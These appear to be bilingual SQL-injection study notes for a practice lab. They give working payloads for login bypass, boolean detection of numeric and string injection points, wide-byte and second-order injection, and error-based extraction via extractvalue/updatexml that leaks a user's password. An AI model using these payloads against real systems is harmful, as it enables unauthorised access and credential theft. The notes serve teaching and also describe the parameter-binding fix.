注入类型
#1.万能注入 'or 1=1 -- '   （填在用户名处；注意 MySQL 的 -- 注释后面必须跟一个空格才会生效，所以 payload 末尾的空格不能省）
#select * from users where username=' ' or 1=1 -- 'and password='admin4'   （or 1=1 恒真，-- 之后的 and password=... 被整体注释掉，条件退化为"全部用户"）
#一·数字型注入判断
#1.?id=1'
#select * from users where id=1';  多出的单引号在数字型和字符型（对比下文 Semester='20201'' 同样报错）两种情况下都会产生语法错误，单凭这一步分不出类型，要结合第 2、3 步 and 1=1 / and 1=2 的结果对比来判断
#2.?id=1 and 1=1
-- 2. ?id=1 and 1=1 -> in a numeric context the injected predicate is true and the row
--    is returned as usual; in a string context the whole value "1 and 1=1" would be
--    compared as one literal and nothing would match.
SELECT * FROM users WHERE id = 1 AND 1 = 1;
-- 3. ?id=1 and 1=2 -> no error but an empty result: the injected predicate is false.
--    Seeing "rows" vs "no rows" between steps 2 and 3 is the boolean signal that id is
--    a numeric injection point (demonstration only; real code must bind id as a parameter).
SELECT * FROM users WHERE id = 1 AND 1 = 2;
#二。字符型注入点-单引号闭合
USE stu;
-- 1. ?Semester=20201'  -> the extra quote leaves the literal unclosed, so the statement errors:
-- SELECT * FROM stu.sc WHERE Semester = '20201'';
-- 2. ?Semester=20201' and '1'='1  -> the injected quote closes the application's literal and the
--    query's own trailing quote closes the payload. Normal result set is returned.
--    NOTE(review): the blank inside '1 ' is reproduced from the original note. Whether it matters
--    depends on the collation: PAD SPACE collations (e.g. utf8mb4_general_ci) ignore trailing
--    spaces so '1'='1 ' is true, NO PAD collations (MySQL 8's default utf8mb4_0900_ai_ci) do not.
--    The real payload most likely has no trailing blank — confirm against the target server.
SELECT * FROM stu.sc WHERE Semester = '20201' AND '1' = '1 ';
-- 3. ?Semester=20201' and '1'='2  -> no error, empty result: the boolean signal of a
--    single-quote-closed string injection point.
SELECT * FROM stu.sc WHERE Semester = '20201' AND '1' = '2 ';
#动态字符串构建
#1.宽字节注入：连接字符集为 GBK 时，输入 %df' 经转义变成 %df\'（\ 为 0x5c），0xdf 0x5c 会被当成一个双字节 GBK 字符吃掉，后面的 ' 因此逃出转义得以闭合引号
#2.二次注入：数据首次写入时被转义/看似合法地存入库中，之后被原样取出再拼进另一条 SQL 时才生效（参见文末 UPDATE 示例里直接拼接的 $row1）
数字型判断 id=1/0 若报错则为数字型。注意：在 MySQL 的 SELECT 里 1/0 只返回 NULL（至多产生一个警告），并不会报错，所以这个判据依赖具体数据库/配置（SQL Server 等会直接抛除零错误），不如上面 and 1=1 / and 1=2 的结果对比可靠。
报错例如: select * from test where ide = 1 and (updatexml(1,0x7e,3)); 第二个参数 0x7e 即 ~，不是合法的 XPath 表达式，MySQL 会抛出 XPath 语法错误并在错误信息中回显该表达式；把子查询结果 concat 进这个参数，就能通过报错把数据带出（报错回显有长度上限，通常约 32 个字符，过长的数据需要分段取）。
uname=admin&passwd=1' and (extractvalue(1,concat(0x5c,(select password from (select password from users where username='admin1') b) ,0x5c)))--+&submit=Submit
(extractvalue(1,concat(0x5c,(select password from users where username='admin1'),0x5c)))   ← 核心结构：0x5c 是 \，拼出非法 XPath 让报错信息回显 password。上一行 payload 额外把子查询包成派生表 (select password from (select ... ) b)，是因为目标语句是对 users 表的 UPDATE，MySQL 不允许在同一条语句的子查询里直接读被更新的表（错误 1093）。
UPDATE users SET password = '1' and (extractvalue (1,concat(0x5c,(select password from users where username='admin1'),0x5c))) --+' WHERE username='$row1'"
注：这是被注入后的目标语句。passwd 的值和 $row1 都是由应用直接拼接进 SQL 字符串的，这正是漏洞根因（$row1 来自之前查出的用户名，也是二次注入的入口）。写成上面这样直接 select users 在 MySQL 中会报 1093，实际 payload 需要如上一行那样包一层派生表。修复方式不是过滤关键字，而是改用预处理语句/参数绑定，任何用户可控值都不再进入 SQL 文本。